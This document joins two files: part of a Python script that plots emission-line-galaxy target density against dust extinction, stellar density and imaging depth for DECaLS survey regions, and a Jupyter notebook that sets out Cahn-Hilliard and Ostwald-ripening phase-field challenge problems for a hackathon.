hg1 = np.histogram(felg[w1g]['EBV'],weights=1./effbmw*ws,range=(0,0.15))
hgn1 = np.histogram(felg[dbml]['EBV'],bins=hg1[1],weights=1./effbm*wsn)
hrn1 = np.histogram(relg[rbml]['EBV'],bins=hg1[1])
hr1 = np.histogram(relg[w1r]['EBV'],bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
w1g = ~wg & ddnl
w1r = ~wr & rdnl
ws = 1./(slp*stardensg[w1g]+b)
wsn = 1./(slp*stardensg[ddnl]+b)
effdnw = effsouthl[w1g]
hg2 = np.histogram(felg[w1g]['EBV'],weights=1./effdnw**2.*ws,range=(0,0.15))
hgn2 = np.histogram(felg[ddnl]['EBV'],bins=hg2[1],weights=1./effdn**2.*wsn)
hrn2 = np.histogram(relg[rdnl]['EBV'],bins=hg2[1])
hr2 = np.histogram(relg[w1r]['EBV'],bins=hg2[1])
#DECaLS S
w1g = ~wg & ddsl
w1r = ~wr & rdsl
effdsw = effsouthl[w1g]
hg3 = np.histogram(felg[w1g]['EBV'],weights=1./effdsw**2.,range=(0,0.15))
hgn3 = np.histogram(felg[ddsl]['EBV'],bins=hg3[1],weights=1./effds**2.)
hrn3 = np.histogram(relg[rdsl]['EBV'],bins=hg3[1])
hr3 = np.histogram(relg[w1r]['EBV'],bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
norm1n = sum(hgn1[0])/sum(hrn1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hrn1[0]/norm1n,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
norm2n = sum(hgn2[0])/sum(hrn2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hrn2[0]/norm2n,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
norm3n = sum(hgn3[0])/sum(hrn3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hrn3[0]/norm3n,'b:')
plt.ylim(.7,1.3)
plt.xlabel('E(B-V)')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.title(r'dashed is before masking |$\Delta$|E(B-V)$>0.02$, points are after')
plt.show()
def plotvsstar(d1,r1,reg='',fmt='ko'):
w1 = d1
#w1 &= felg['MORPHTYPE'] == mp
#w1 &= d1['EBV'] < 0.15 #mask applied to (e)BOSS
#mr = r1['EBV'] < 0.15
hd1 = np.histogram(stardensg[w1],range=(0,5000))
#print(hd1)
hr1 = np.histogram(stardensr[r1],bins=hd1[1])
#print(hr1)
xl = []
for i in range(0,len(hd1[0])):
xl.append((hd1[1][i]+hd1[1][i+1])/2.)
plt.errorbar(xl,hd1[0]/hr1[0],np.sqrt(hd1[0])/hr1[0],fmt=fmt)
#plt.title(str(mp)+reg)
#plt.ylabel('relative density')
#plt.xlabel('stellar density')
#plt.show()
morphl = np.unique(felg['MORPHTYPE'])
print(morphl)
for mp in morphl:
msel = felg['MORPHTYPE'] == mp
tsel = ddsl & msel
tseln = ddnl & msel
print(mp)
print(len(felg[tsel])/len(felg[ddsl]),len(felg[tseln])/len(felg[ddnl]))
plotvsstar(tsel,rdsl,'DECaLS South')
plotvsstar(tseln,rdnl,'DECaLS North',fmt='rd')
# plt.title(str(mp)+reg)
plt.ylabel('relative density')
plt.xlabel('stellar density')
plt.legend(['DECaLS SGC','DECaLS NGC'])
plt.title('selecting type '+mp)
plt.show()
'''
Divide DECaLS S into DES and non-DES
'''
import pymangle
desply ='/global/cscratch1/sd/raichoor/desits/des.ply'
mng = pymangle.mangle.Mangle(desply)
polyidd = mng.polyid(felg['RA'],felg['DEC'])
isdesd = polyidd != -1
polyidr = mng.polyid(relg['RA'],relg['DEC'])
isdesr = polyidr != -1
ddsdl = ddsl & isdesd
ddsndl = ddsl & ~isdesd
rdsdl = rdsl & isdesr
rdsndl = rdsl & ~isdesr
#DECaLS SGC DES
hg1 = np.histogram(stardensg[ddsdl],weights=1./effsouthl[ddsdl]**2.,range=(0,5000))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(stardensg[ddsl],bins=hg3[1])
hr1 = np.histogram(stardensr[rdsdl],bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(stardensg[ddsndl],weights=1./effsouthl[ddsndl]**2.,range=(0,5000))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(stardensg[ddsndl],bins=hg3[1])
hr2 = np.histogram(stardensr[rdsndl],bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('Stellar Density')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
g-band depth
'''
#DECaLS SGC DES
hg1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(felg[ddsdl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsdl]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rdsdl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsdl]['EBV']),bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(felg[ddsndl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsndl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdsndl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsndl]['EBV']),bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_G*MWTRANS')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
r-band depth
'''
#DECaLS SGC DES
hg1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,2000))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(felg[ddsdl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsdl]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rdsdl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsdl]['EBV']),bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,2000))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(felg[ddsndl]['GALDEPTH_R']*np.exp(-1.*R_R*felg[ddsndl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdsndl]['GALDEPTH_R']*np.exp(-1.*R_R*relg[rdsndl]['EBV']),bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_R*MWTRANS')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
z-band depth
'''
#DECaLS SGC DES
hg1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),weights=1./effsouthl[ddsdl]**2.,range=(0,500))
#hg1 = np.histogram(stardensg[ddsdl],range=(0,5000))
hgn1 = np.histogram(felg[ddsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsdl]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rdsdl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsdl]['EBV']),bins=hg1[1])
#DECaLS SGC not DES
hg2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),weights=1./effsouthl[ddsndl]**2.,range=(0,500))
#hg2 = np.histogram(stardensg[ddsndl],range=(0,5000))
hgn2 = np.histogram(felg[ddsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddsndl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdsndl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdsndl]['EBV']),bins=hg2[1])
xl1 = []
xl2 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
#plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
#plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_Z*MWTRANS')
plt.ylabel('relative density')
plt.legend((['DES','SGC, not DES']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
#plt.title('dashed is before MC+stellar density correction, points are after')
plt.show()
'''
Above results didn't quite work at low depth; checking what happens when snr requirements are ignored in the MC
Results are gone, but they basically show that removing the snr requirements makes things worse
'''
grids = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridsouth.dat').transpose()
#grids[3] = grids[3]
gridn = np.loadtxt(os.getenv('SCRATCH')+'/ELGeffnosnrgridnorth.dat').transpose()
effsouthlno = interpeff(gsig,rsig,zsig,south=True)
effnorthlno = interpeff(gsig,rsig,zsig,south=False)
effbmno = effnorthlno[dbml]
print(np.mean(effbmno))
effbmno = effbmno/np.mean(effbmno)
plt.hist(effbmno,bins=100)
plt.show()
effdnno = effsouthlno[ddnl]
print(np.mean(effdnno))
effdnno = effdnno/np.mean(effdnno)
plt.hist(effdnno,bins=100)
plt.show()
#plt.scatter(felg[dbml]['RA'],felg[dbml]['DEC'],c=effbm)
#plt.colorbar()
#plt.show()
effdsno = effsouthlno[ddsl]
print(np.mean(effdsno))
effdsno = effdsno/np.mean(effdsno)
plt.hist(effdsno,bins=100)
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,200))
hgn1 = np.histogram(felg[dbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[dbml]['EBV']),bins=hg1[1])
hr1 = np.histogram(relg[rbml]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,200))
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*felg[ddnl]['EBV']),bins=hg2[1])
hr2 = np.histogram(relg[rdnl]['GALDEPTH_Z']*np.exp(-1.*R_Z*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
hg3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_R*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,200))
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_Z']*np.exp(-1.*R_R*felg[ddsl]['EBV']),bins=hg3[1])
hr3 = np.histogram(relg[rdsl]['GALDEPTH_Z']*np.exp(-1.*R_R*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hr1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hr2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hr3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_Z*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.show()
#bmzls
slp = -0.2/4000.
b = 1.1
ws = 1./(slp*stardensg[dbml]+b)
hg1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),weights=1./effbmno*ws,range=(0,2000))
hr1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#no correction
hgn1 = np.histogram(felg[dbml]['GALDEPTH_G']*np.exp(-3.214*felg[dbml]['EBV']),bins=hg1[1])
hrn1 = np.histogram(relg[rbml]['GALDEPTH_G']*np.exp(-3.214*relg[rbml]['EBV']),bins=hg1[1])
#DECaLS N
slp = -0.35/4000.
b = 1.1
ws = 1./(slp*stardensg[ddnl]+b)
hg2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),weights=1./effdnno**2.*ws,range=(0,3000))
hr2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
hgn2 = np.histogram(felg[ddnl]['GALDEPTH_G']*np.exp(-3.214*felg[ddnl]['EBV']),bins=hg2[1])
hrn2 = np.histogram(relg[rdnl]['GALDEPTH_G']*np.exp(-3.214*relg[rdnl]['EBV']),bins=hg2[1])
#DECaLS S
#no strong relation with stellar density
hg3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),weights=1./effdsno**2.,range=(0,2000))
hr3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
hgn3 = np.histogram(felg[ddsl]['GALDEPTH_G']*np.exp(-3.214*felg[ddsl]['EBV']),bins=hg3[1])
hrn3 = np.histogram(relg[rdsl]['GALDEPTH_G']*np.exp(-3.214*relg[rdsl]['EBV']),bins=hg3[1])
xl1 = []
xl2 = []
xl3 = []
for i in range(0,len(hg1[0])):
xl1.append((hg1[1][i]+hg1[1][i+1])/2.)
xl2.append((hg2[1][i]+hg2[1][i+1])/2.)
xl3.append((hg3[1][i]+hg3[1][i+1])/2.)
norm1 = sum(hg1[0])/sum(hr1[0])
plt.errorbar(xl1,hg1[0]/hr1[0]/norm1,np.sqrt(hg1[0])/hr1[0],fmt='ko')
plt.plot(xl1,hgn1[0]/hrn1[0]/norm1,'k:')
norm2 = sum(hg2[0])/sum(hr2[0])
plt.errorbar(xl2,hg2[0]/hr2[0]/norm2,np.sqrt(hg2[0])/hr2[0],fmt='rd')
plt.plot(xl2,hgn2[0]/hrn2[0]/norm2,'r:')
norm3 = sum(hg3[0])/sum(hr3[0])
plt.errorbar(xl3,hg3[0]/hr3[0]/norm3,np.sqrt(hg3[0])/hr3[0],fmt='b^')
plt.plot(xl3,hgn3[0]/hrn3[0]/norm1,'b:')
plt.ylim(.7,1.3)
plt.xlabel('GALDEPTH_G*MWTRANS')
plt.ylabel('relative density')
plt.legend((['bmzls','DECaLS N','DECaLS S']))
plt.plot(xl2,np.ones(len(xl2)),'k--')
plt.show()
```
|
github_jupyter
|
```
from IPython.display import HTML
HTML('''<script>
code_show=true;
function code_toggle() {
if (code_show){
$('div.input').hide();
$('div.prompt').hide();
} else {
$('div.input').show();
$('div.prompt').show();
}
code_show = !code_show
}
$( document ).ready(code_toggle);
</script>
<form action="javascript:code_toggle()"><input type="submit" value="Code Toggle"></form>''')
```
# Table of Contents
* [Challenge Problems](#Challenge-Problems)
* [1. Spinodal Decomposition - Cahn-Hilliard](#1.-Spinodal-Decomposition---Cahn-Hilliard)
* [Parameter Values](#Parameter-Values)
* [Initial Conditions](#Initial-Conditions)
* [Domains](#Domains)
* [a. Square Periodic](#a.-Square-Periodic)
* [b. No Flux](#b.-No-Flux)
* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)
* [d. Sphere](#d.-Sphere)
* [Tasks](#Tasks)
* [2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations](#2.-Ostwald-Ripening----coupled-Cahn-Hilliard-and-Allen-Cahn-equations)
* [Parameter Values](#Parameter-Values)
* [Initial Conditions](#Initial-Conditions)
* [Domains](#Domains)
* [a. Square Periodic](#a.-Square-Periodic)
* [b. No Flux](#b.-No-Flux)
* [c. T-Shape No Flux](#c.-T-Shape-No-Flux)
* [d. Sphere](#d.-Sphere)
* [Tasks](#Tasks)
# Challenge Problems
For the first hackathon there are two challenge problems, a spinodal decomposition problem and an Ostwald ripening problem. The only solutions included here currently are with FiPy.
## 1. Spinodal Decomposition - Cahn-Hilliard
The free energy density is given by,
$$ f = f_0 \left[ c \left( \vec{r} \right) \right] + \frac{\kappa}{2} \left| \nabla c \left( \vec{r} \right) \right|^2 $$
where $f_0$ is the bulk free energy density given by,
$$ f_0\left[ c \left( \vec{r} \right) \right] =
- \frac{A}{2} \left(c - c_m\right)^2
+ \frac{B}{4} \left(c - c_m\right)^4
+ \frac{c_{\alpha}}{4} \left(c - c_{\alpha} \right)^4
+ \frac{c_{\beta}}{4} \left(c - c_{\beta} \right)^4 $$
where $c_m = \frac{1}{2} \left( c_{\alpha} + c_{\beta} \right)$ and $c_{\alpha}$ and $c_{\beta}$ are the concentrations at which the bulk free energy density has minima (corresponding to the solubilities in the matrix phase and the second phase, respectively).
The time evolution of the concentration field, $c$, is given by the Cahn-Hilliard equation:
$$ \frac{\partial c}{\partial t} = \nabla \cdot \left[
D \left( c \right) \nabla \left( \frac{ \partial f_0 }{ \partial c} - \kappa \nabla^2 c \right)
\right] $$
where $D$ is the diffusivity.
### Parameter Values
Use the following parameter values.
<table width="200">
<tr>
<td> $c_{\alpha}$ </td>
<td> 0.05 </td>
</tr>
<tr>
<td> $c_{\beta}$ </td>
<td> 0.95 </td>
</tr>
<tr>
<td> A </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa$ </td>
<td> 2.0 </td>
</tr>
</table>
with
$$ B = \frac{A}{\left( c_{\alpha} - c_m \right)^2} $$
$$ D = D_{\alpha} = D_{\beta} = \frac{2}{c_{\beta} - c_{\alpha}} $$
### Initial Conditions
Set $c\left(\vec{r}, t\right)$ such that
$$ c\left(\vec{r}, 0\right) = \bar{c}_0 + \epsilon \cos \left( \vec{q} \cdot \vec{r} \right) $$
where
<table width="200">
<tr>
<td> $\bar{c}_0$ </td>
<td> 0.45 </td>
</tr>
<tr>
<td> $\vec{q}$ </td>
<td> $\left(\sqrt{2},\sqrt{3}\right)$ </td>
</tr>
<tr>
<td> $\epsilon$ </td>
<td> 0.01 </td>
</tr>
</table>
### Domains
#### a. Square Periodic
2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.
```
from IPython.display import SVG
SVG(filename='../images/block1.svg')
```
#### b. No Flux
2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.
#### c. T-Shape No Flux
T-shaped reiong with zero flux boundary conditions with $a=b=100$ and $c=d=20.$
```
from IPython.display import SVG
SVG(filename='../images/t-shape.svg')
```
#### d. Sphere
Domain is the surface of a sphere with radius 100, but with initial conditions of
$$ c\left(\theta, \phi, 0\right) = \bar{c}_0 + \epsilon \cos \left( \sqrt{233} \theta \right)
\sin \left( \sqrt{239} \phi \right) $$
where $\theta$ and $\phi$ are the polar and azimuthal angles in a spherical coordinate system. $\bar{c}_0$ and $\epsilon$ are given by the values in the table above.
### Tasks
Your task for each domain,
1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie
2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.
3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.
4. For domain a. above, demonstrate that the solution is robust with respect to meshing by refining the mesh (e.g. reduce the mesh size by about a factor of $\sqrt{2}$ in linear dimensions -- use whatever convenient way you have to refine the mesh without exploding the computational time).
## 2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations
Expanded problem in that the phase field, described by variables $\eta_i$, is now coupled to the concentration field $c$. The Ginzberg-Landau free energy density is now taken to be,
$$ f = f_0 \left[ C \left( \vec{r} \right), \eta_1, ... , \eta_p \right]
+ \frac{\kappa_C}{2} \left[ \nabla C \left( \vec{r} \right) \right]^2 +
\sum_{i=1}^p \frac{\kappa_C}{2} \left[ \nabla \eta_i \left( \vec{r} \right) \right]^2
$$
Here, $f_0$ is a bulk free energy density,
$$ f_0 \left[ C \left( \vec{r} \right), \eta_1, ... , \eta_p \right]
= f_1 \left( C \right) + \sum_{i=1}^p f_2 \left( C, \eta_i \right)
+ \sum_{i=1}^p \sum_{j\ne i}^p f_3 \left( \eta_j, \eta_i \right) $$
Here, $ f_1 \left( C \right) $ is the free energy density due to the concentration field, $C$, with local minima at $C_{\alpha}$ and $C_{\beta}$ corresponding to the solubilities in the matrix phase and the second phase, respectively; $f_2\left(C , \eta_i \right)$ is an interaction term between the concentration field and the phase fields, and $f_3 \left( \eta_i, \eta_j \right)$ is the free energy density of the phase fields. Simple models for these free energy densities are,
$$ f_1\left( C \right) =
- \frac{A}{2} \left(C - C_m\right)^2
+ \frac{B}{4} \left(C - C_m\right)^4
+ \frac{D_{\alpha}}{4} \left(C - C_{\alpha} \right)^4
+ \frac{D_{\beta}}{4} \left(C - C_{\beta} \right)^4 $$
where
$$ C_m = \frac{1}{2} \left(C_{\alpha} + C_{\beta} \right) $$
and
$$ f_2 \left( C, \eta_i \right) = - \frac{\gamma}{2} \left( C - C_{\alpha} \right)^2 \eta_i^2 + \frac{\beta}{2} \eta_i^4 $$
where
$$ f_3 \left( \eta_i, \eta_j \right) = \frac{ \epsilon_{ij} }{2} \eta_i^2 \eta_j^2, i \ne j $$
The time evolution of the system is now given by coupled Cahn-Hilliard and Allen-Cahn (time dependent Gizberg-Landau) equations for the conserved concentration field and the non-conserved phase fields:
$$
\begin{eqnarray}
\frac{\partial C}{\partial t} &=& \nabla \cdot \left \{
D \nabla \left[ \frac{\delta F}{\delta C} \right] \right \} \\
&=& D \left[ -A + 3 B \left( C- C_m \right)^2 + 3 D_{\alpha} \left( C - C_{\alpha} \right)^2 + 3 D_{\beta} \left( C - C_{\beta} \right)^2 \right] \nabla^2 C \\
& & -D \gamma \sum_{i=1}^{p} \left[ \eta_i^2 \nabla^2 C + 4 \nabla C \cdot \nabla \eta_i + 2 \left( C - C_{\alpha} \right) \nabla^2 \eta_i \right] - D \kappa_C \nabla^4 C
\end{eqnarray}
$$
and the phase field equations
$$
\begin{eqnarray}
\frac{\partial \eta_i}{\partial t} &=& - L_i \frac{\delta F}{\delta \eta_i} \\
&=& \frac{\partial f_2}{\delta \eta_i} + \frac{\partial f_3}{\delta \eta_i} - \kappa_i \nabla^2 \eta_i \left(\vec{r}, t\right) \\
&=& L_i \gamma \left( C - C_{\alpha} \right)^2 \eta_i - L_i \beta \eta_i^3 - L_i \eta_i \sum_{j\ne i}^{p} \epsilon_{ij} \eta^2_j + L_i \kappa_i \nabla^2 \eta_i
\end{eqnarray}
$$
### Parameter Values
Use the following parameter values.
<table width="200">
<tr>
<td> $C_{\alpha}$ </td>
<td> 0.05 </td>
</tr>
<tr>
<td> $C_{\beta}$ </td>
<td> 0.95 </td>
</tr>
<tr>
<td> A </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa_i$ </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa_j$ </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa_k$ </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\epsilon_{ij}$ </td>
<td> 3.0 </td>
</tr>
<tr>
<td> $\beta$ </td>
<td> 1.0 </td>
</tr>
<tr>
<td> $p$ </td>
<td> 10 </td>
</tr>
</table>
with
$$ B = \frac{A}{\left( C_{\alpha} - C_m \right)^2} $$
$$ \gamma = \frac{2}{\left(C_{\beta} - C_{\alpha}\right)^2} $$
$$ D = D_{\alpha} = D_{\beta} = \frac{\gamma}{\delta^2} $$
The diffusion coefficient, $D$, is constant and isotropic and the same (unity) for both phases; the mobility-related constants, $L_i$, are the same (unity) for all phase fields.
### Initial Conditions
Set $c\left(\vec{r}, t\right)$ such that
$$
\begin{eqnarray}
c\left(\vec{r}, 0\right) &=& \bar{c}_0 + \epsilon \cos \left( \vec{q} \cdot \vec{r} \right) \\
\eta_i\left(\vec{r}, 0\right) &=& \bar{\eta}_0 + 0.01 \epsilon_i \cos^2 \left( \vec{q} \cdot \vec{r} \right)
\end{eqnarray}
$$
where
<table width="200">
<tr>
<td> $\bar{c}_0$ </td>
<td> 0.5 </td>
</tr>
<tr>
<td> $\vec{q}$ </td>
<td> $\left(\sqrt{2},\sqrt{3}\right)$ </td>
</tr>
<tr>
<td> $\epsilon$ </td>
<td> 0.01 </td>
</tr>
<tr>
<td> $\vec{q}_i$ </td>
<td> $\left( \sqrt{23 + i}, \sqrt{149 + i} \right)$ </td>
</tr>
<tr>
<td> $\epsilon_i$ </td>
<td> 0.979285, 0.219812, 0.837709, 0.695603, 0.225115,
0.389266, 0.585953, 0.614471, 0.918038, 0.518569 </td>
</tr>
<tr>
<td> $\eta_0$ </td>
<td> 0.0 </td>
</tr>
</table>
### Domains
#### a. Square Periodic
2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.
```
from IPython.display import SVG
SVG(filename='../images/block1.svg')
```
#### b. No Flux
2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.
#### c. T-Shape No Flux
T-shaped reiong with zero flux boundary conditions with $a=b=100$ and $c=d=20.$
```
from IPython.display import SVG
SVG(filename='../images/t-shape.svg')
```
#### d. Sphere
Domain is the surface of a sphere with radius 100, but with initial conditions of
$$ c\left(\theta, \phi, 0\right) = \bar{c}_0 + \epsilon \cos \left( \sqrt{233} \theta \right)
\sin \left( \sqrt{239} \phi \right) $$
and
$$ \eta_i\left(\theta, \phi, 0\right) = \bar{\eta}_0 + 0.01 \epsilon_i \cos^2 \left( \sqrt{23 + i} \theta \right)
\sin^2 \left( \sqrt{149 + i} \phi \right) $$
